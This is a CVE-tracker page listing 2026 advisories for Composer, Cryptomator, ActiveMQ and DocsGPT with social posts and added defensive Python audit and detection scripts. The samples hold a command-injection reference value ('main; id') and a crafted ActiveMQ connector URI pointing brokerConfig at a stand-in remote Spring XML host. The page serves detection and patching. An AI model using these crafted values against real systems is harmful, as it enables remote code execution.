
Overview

  • composer
  • composer

15 Apr 2026
Published
16 Apr 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
0.04%

KEV

Description

Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping, and additionally in the Perforce::generateP4Command() method as in GHSA-wg36-wvj6-r67p / CVE-2026-40176, which interpolates user-supplied Perforce connection parameters (port, user, client) from the source url field without proper escaping. An attacker can inject arbitrary commands through crafted source reference or source url values containing shell metacharacters, even if Perforce is not installed. Unlike CVE-2026-40176, the source reference and url are provided as part of package metadata, meaning any compromised or malicious Composer repository can serve package metadata declaring perforce as a source type with malicious values. This vulnerability is exploitable when installing or updating dependencies from source, including the default behavior when installing dev-prefixed versions. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline). If developers are unable to immediately update, they can avoid installing dependencies from source by using --prefer-dist or the preferred-install: dist config setting, and only use trusted Composer repositories as a workaround.
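The description above gives both the bug (metadata values concatenated into a shell command) and the workaround (install from dist, trust only known repositories). The Python below is an added example, not Composer's own code: it audits a constructed composer.lock for perforce sources whose url or reference carry shell metacharacters, reports whether composer.json pins preferred-install to dist, and contrasts an unescaped command build with one that quotes every metadata-derived value. The lock and config snippets are constructed, and build_p4_command_unsafe / build_p4_command_safe only approximate the command shape of Composer's Perforce driver.

```python
"""Audit Composer package metadata for Perforce sources that can reach the
CVE-2026-40261 injection path, and contrast unescaped interpolation with
proper quoting.

Added example for this page; it is not Composer's own code. The lock-file
and composer.json snippets are constructed, and the two build_p4_command_*
functions only approximate the command shape of Composer's Perforce driver.
"""
from __future__ import annotations

import json
import re
import shlex

# Any of these lets a metadata value break out of the intended p4 argument.
SHELL_META = re.compile(r"""[;&|`$<>(){}\n\\'"* ]""")


def build_p4_command_unsafe(port: str, user: str, client: str, reference: str) -> str:
    """Plain interpolation: the pattern the advisory describes."""
    return f"p4 -u {user} -c {client} -p {port} sync -f @{reference}"


def build_p4_command_safe(port: str, user: str, client: str, reference: str) -> str:
    """Every metadata-derived value becomes exactly one shell word."""
    return (
        f"p4 -u {shlex.quote(user)} -c {shlex.quote(client)} "
        f"-p {shlex.quote(port)} sync -f {shlex.quote('@' + reference)}"
    )


def audit_lock(lock: dict) -> list[dict]:
    """One finding per package whose source type is perforce, recording which
    of url/reference carry shell metacharacters."""
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            src = pkg.get("source") or {}
            if src.get("type") != "perforce":
                continue
            tainted = [k for k in ("url", "reference")
                       if SHELL_META.search(str(src.get(k, "")))]
            findings.append({
                "name": pkg.get("name"),
                "section": section,
                "url": src.get("url"),
                "reference": src.get("reference"),
                "metacharacters_in": tainted,
            })
    return findings


def prefers_dist(composer_json: dict) -> bool:
    """True when the advisory's workaround (preferred-install: dist) covers every package."""
    pref = (composer_json.get("config") or {}).get("preferred-install")
    if isinstance(pref, dict):
        return pref.get("*") == "dist"
    return pref == "dist"


# Constructed composer.lock: one ordinary git package and one whose metadata
# names a perforce source with a shell-metacharacter reference.
SAMPLE_LOCK = json.loads("""{
  "packages": [
    {"name": "vendor/clean", "version": "1.0.0",
     "source": {"type": "git", "url": "https://github.com/vendor/clean.git",
                "reference": "0123456789abcdef"}},
    {"name": "evil/pkg", "version": "dev-main",
     "source": {"type": "perforce", "url": "p4.example.test:1666",
                "reference": "main; id"}}
  ],
  "packages-dev": []
}""")

if __name__ == "__main__":
    for finding in audit_lock(SAMPLE_LOCK):
        print(finding)
    ref = SAMPLE_LOCK["packages"][1]["source"]["reference"]
    print("unsafe:", build_p4_command_unsafe("p4.example.test:1666", "build", "ci-ws", ref))
    print("safe:  ", build_p4_command_safe("p4.example.test:1666", "build", "ci-ws", ref))
    print("prefer dist:", prefers_dist({"config": {"preferred-install": "dist"}}))
```

Load a real composer.lock into audit_lock to get the same report; a perforce source with metacharacters in a project that does not pin preferred-install to dist is exactly the combination the advisory warns about. Quoting is the shape of the fix, but the real remedy is upgrading to 2.2.27 or 2.9.6, since the vulnerable code runs whether or not p4 is installed.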

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 13 hours ago

Fediverse


Composer (the dominant PHP package manager) shipped 2.9.6 and 2.2.27 LTS in April. The release fixes two command-injection bugs in the Perforce driver. CVE-2026-40261, severity 8.8. A malicious composer.json declares a Perforce repository and the shell runs whether or not Perforce is installed. Packagist disabled Perforce metadata April 10. Most CI build agents kept no audit trail across the ninety days the bug was live.

#PHP #CyberSecurity #DevOps #InfoSec #SupplyChain


Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 1 hour ago

Fediverse


RE: mastodon.bsd.cafe/@grahamperri

3/

CVE-2026-7270 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:13.exec <security.freebsd.org/advisorie> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <blog.calif.io/p/mad-bugs-claud>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').


Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 1 hour ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 8 hours ago

Fediverse


CVE-2026-3143 copy.fail/


Overview

  • Microsoft
  • Windows 10 Version 1607

10 Feb 2026
Published
10 Apr 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
3.35%

Description

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

Statistics

  • 2 Posts
  • 1 Interaction

Last activity: 16 hours ago

Bluesky

CISA mandates federal agencies to patch a Windows zero-click vulnerability CVE-2026-32202 by May 12 under BOD 22-01. The flaw connects to APT28 and follows an incomplete Microsoft fix for CVE-2026-21510. #CVE2026 #APT28 #USA

📢 APT28's incomplete patch: CVE-2026-21510 gives way to CVE-2026-32202, zero-click authentication coercion 📝 ## 🔍 Contex… https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/ #APT28 #Cyberveille

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post

Last activity: 1 hour ago

Fediverse


2/

CVE-2026-7164 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:14.pf <security.freebsd.org/advisorie> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.


Overview

  • Microsoft
  • Internet Explorer 9

23 Sep 2019
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
90.77%

Description

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

Statistics

  • 1 Post

Last activity: 13 hours ago

Overview

  • cryptomator
  • cryptomator

20 Mar 2026
Published
27 Mar 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
0.02%

KEV

Description

Cryptomator encrypts data being stored on cloud infrastructure. Prior to version 1.19.1, the Hub-based unlock flow explicitly supports hub+http and consumes Hub endpoints from vault metadata without enforcing HTTPS. As a result, a vault configuration can drive OAuth and key-loading traffic over plaintext HTTP or other insecure endpoint combinations. An active network attacker can tamper with or observe this traffic. Even when the vault key is encrypted for the device, bearer tokens and endpoint-level trust decisions are still exposed to downgrade and interception. This issue has been patched in version 1.19.1.
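The fix the description points at is to refuse anything other than HTTPS before the unlock flow sends a bearer token or fetches a key. The Python below is an added example, not Cryptomator's code, of such a gate: it reads a vault configuration, requires the hub+https key-identifier scheme, requires every Hub endpoint to be an absolute https URL, and optionally pins all hosts to a trusted set so a vault file cannot redirect tokens to an arbitrary https server. The field names (keyId, hub.authEndpoint, hub.tokenEndpoint, hub.devicesResourceUrl) and the sample configurations are assumed for illustration.

```python
"""Reject Hub vault configurations whose key identifier or Hub endpoints
would route OAuth and key-loading traffic over plaintext HTTP, the downgrade
CVE-2026-32309 describes.

Added example for this page; it is not Cryptomator's code. The field names
(keyId, hub.authEndpoint, hub.tokenEndpoint, hub.devicesResourceUrl) and the
sample configurations are assumed for illustration.
"""
from __future__ import annotations

from urllib.parse import urlsplit

HUB_ENDPOINT_FIELDS = ("authEndpoint", "tokenEndpoint", "devicesResourceUrl")


def _https_host(url: str) -> str | None:
    """Hostname of an absolute https URL; None for any other scheme or a missing host."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        return None
    return parts.hostname


def validate_hub_config(config: dict, trusted_hosts: set[str] | None = None) -> list[str]:
    """Return every policy violation; only an empty list should allow the unlock to proceed.

    trusted_hosts, when given, pins the Hub and its endpoints to known hosts.
    """
    problems: list[str] = []

    key_id = str(config.get("keyId", ""))
    scheme, sep, rest = key_id.partition("://")
    if not sep or scheme != "hub+https":
        # hub+http (or anything else) is the downgrade the advisory describes.
        problems.append(f"keyId must use hub+https, got {key_id!r}")
    else:
        key_host = _https_host("https://" + rest)
        if key_host is None:
            problems.append("keyId has no host")
        elif trusted_hosts is not None and key_host not in trusted_hosts:
            problems.append(f"keyId host {key_host} is not trusted")

    hub = config.get("hub") or {}
    for field in HUB_ENDPOINT_FIELDS:
        url = hub.get(field)
        if not isinstance(url, str) or not url:
            problems.append(f"hub.{field} missing")
            continue
        host = _https_host(url)
        if host is None:
            problems.append(f"hub.{field} is not an https URL: {url}")
        elif trusted_hosts is not None and host not in trusted_hosts:
            problems.append(f"hub.{field} host {host} is not trusted")
    return problems


# Constructed vault configurations: a clean one, one with a downgraded key
# identifier, and one where only the token endpoint is plaintext.
GOOD_CONFIG = {
    "keyId": "hub+https://hub.example.test/api/vaults/7f1c",
    "hub": {
        "authEndpoint": "https://login.example.test/realms/hub/protocol/openid-connect/auth",
        "tokenEndpoint": "https://login.example.test/realms/hub/protocol/openid-connect/token",
        "devicesResourceUrl": "https://hub.example.test/api/devices/",
    },
}
DOWNGRADED_CONFIG = {**GOOD_CONFIG, "keyId": "hub+http://hub.example.test/api/vaults/7f1c"}
MIXED_CONFIG = {
    **GOOD_CONFIG,
    "hub": {**GOOD_CONFIG["hub"],
            "tokenEndpoint": "http://login.example.test/realms/hub/protocol/openid-connect/token"},
}

if __name__ == "__main__":
    for name, cfg in (("good", GOOD_CONFIG), ("downgraded", DOWNGRADED_CONFIG), ("mixed", MIXED_CONFIG)):
        print(name, validate_hub_config(cfg) or "ok")
    print("pinned", validate_hub_config(GOOD_CONFIG, {"hub.example.test"}))
```

The check must run before any network I/O: the point of the advisory is that the vault metadata itself is attacker-influenced, so the decision about where tokens go cannot be left to whatever the metadata says.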

Statistics

  • 1 Post

Last activity: 19 hours ago

Bluesky

https://zenn.dev/ao9s/articles/cryptomator-hub-http-downgrade A first-hand account of a student who found a vulnerability in Cryptomator (CVE-2026-32309) and obtained a CVE. Insufficient validation of externally supplied values made a downgrade attack to plain HTTP communication possible. It covers the quick turnaround from report to fix to CVE publication, and the importance of reproduction steps.

Overview

  • Apache Software Foundation
  • Apache ActiveMQ Broker
  • org.apache.activemq:activemq-broker

07 Apr 2026
Published
17 Apr 2026
Updated

CVSS
Pending
EPSS
65.07%

Description

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
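The description gives a detection engineer the three fields that identify the dangerous call on the web console: a Jolokia request of type exec, an MBean in the org.apache.activemq domain, and the operation addConnector or addNetworkConnector, with a connector URI carrying brokerConfig= marking the remote-Spring-XML case. The Python below is an added example, not code from ActiveMQ, Jolokia or Horizon3, that applies those rules to both Jolokia request forms, POST (JSON, single or batch) and GET (path segments, where a literal slash inside a segment is escaped as "!/"). The request records are constructed and the URI shapes are illustrative rather than a working exploit.

```python
"""Flag Jolokia requests to an ActiveMQ web console that invoke the
connector-adding operations named above, ranking the ones whose connector
URI asks the VM transport for a brokerConfig (the remote Spring XML path)
as critical.

Added example for this page; it is not ActiveMQ's, Jolokia's or Horizon3's
code. The request records are constructed and the URI shapes are
illustrative, not a working exploit.
"""
from __future__ import annotations

import json
import re
from urllib.parse import unquote

JOLOKIA_PREFIX = "/api/jolokia/"
RISKY_OPS = {"addConnector", "addNetworkConnector"}


def _requests_from_get(path: str) -> list[dict]:
    """Decode Jolokia's GET form /api/jolokia/exec/<mbean>/<op>/<arg>/...
    Jolokia escapes a literal '/' inside a segment as '!/'."""
    path_only = path.split("?", 1)[0]
    idx = path_only.find(JOLOKIA_PREFIX)
    if idx < 0:
        return []
    rest = path_only[idx + len(JOLOKIA_PREFIX):]
    parts = [unquote(p).replace("!/", "/") for p in re.split(r"(?<!!)/", rest)]
    if len(parts) < 3 or parts[0] != "exec":
        return []
    return [{"type": "exec", "mbean": parts[1], "operation": parts[2], "arguments": parts[3:]}]


def _requests_from_post(path: str, body: str | None) -> list[dict]:
    """Jolokia POST bodies are one request object or a batch list of them."""
    if JOLOKIA_PREFIX.rstrip("/") not in path:
        return []
    try:
        data = json.loads(body or "")
    except ValueError:
        return []
    items = data if isinstance(data, list) else [data]
    return [item for item in items if isinstance(item, dict)]


def find_connector_abuse(method: str, path: str, body: str | None = None) -> list[dict]:
    """Findings for exec calls on org.apache.activemq MBeans that add connectors."""
    reqs = (_requests_from_post(path, body) if method.upper() == "POST"
            else _requests_from_get(path))
    findings = []
    for req in reqs:
        if req.get("type") != "exec":
            continue
        mbean = str(req.get("mbean", ""))
        op = str(req.get("operation", "")).split("(", 1)[0]  # drop "(java.lang.String)"
        if not mbean.startswith("org.apache.activemq:") or op not in RISKY_OPS:
            continue
        args = [str(a) for a in (req.get("arguments") or [])]
        remote_config = any("brokerConfig=" in a for a in args)
        findings.append({"mbean": mbean, "operation": op, "arguments": args,
                         "severity": "critical" if remote_config else "high"})
    return findings


def scan(records: list) -> list[dict]:
    """Run find_connector_abuse over (method, path, body) records, tagging findings by index."""
    out = []
    for i, (method, path, body) in enumerate(records):
        for finding in find_connector_abuse(method, path, body):
            out.append({"index": i, **finding})
    return out


# Constructed request records: a benign attribute read, a batch that only
# touches java.lang MBeans, a POST adding a network connector whose VM URI
# carries brokerConfig, and a GET adding a plain TCP connector.
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_REQUESTS = [
    ("GET", f"/api/jolokia/read/{BROKER}/TotalConnectionsCount", None),
    ("POST", "/api/jolokia/", json.dumps([
        {"type": "read", "mbean": BROKER, "attribute": "BrokerVersion"},
        {"type": "exec", "mbean": "java.lang:type=Memory", "operation": "gc"},
    ])),
    ("POST", "/api/jolokia/", json.dumps({
        "type": "exec", "mbean": BROKER,
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["static:(vm://localhost?brokerConfig=xbean:http://remote.example/ctx.xml)"],
    })),
    ("GET", f"/api/jolokia/exec/{BROKER}/addConnector/tcp:!/!/0.0.0.0:61617", None),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Because the page notes that the default Jolokia access policy permits exec on org.apache.activemq:*, the same three fields are what a tightened jolokia-access.xml or a reverse-proxy rule in front of the console should deny until the broker is on 5.19.4 or 6.2.3. The attacker in this CVE is already authenticated to the console, so a hit is a credential-misuse signal, not noise.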

Statistics

  • 1 Post

Last activity: 16 hours ago

Fediverse


Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di


Overview

  • arc53
  • DocsGPT

29 Apr 2026
Published
29 Apr 2026
Updated

CVSS v4.0
CRITICAL (10.0)
EPSS
Pending

KEV

Description

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker with access to either the official DocsGPT website or any local or public deployment can craft a malicious payload that bypasses the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

Statistics

  • 1 Post

Last activity: 5 hours ago

Fediverse


🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! radar.offseq.com/threat/cve-20

Showing 11 to 20 of 43 CVEs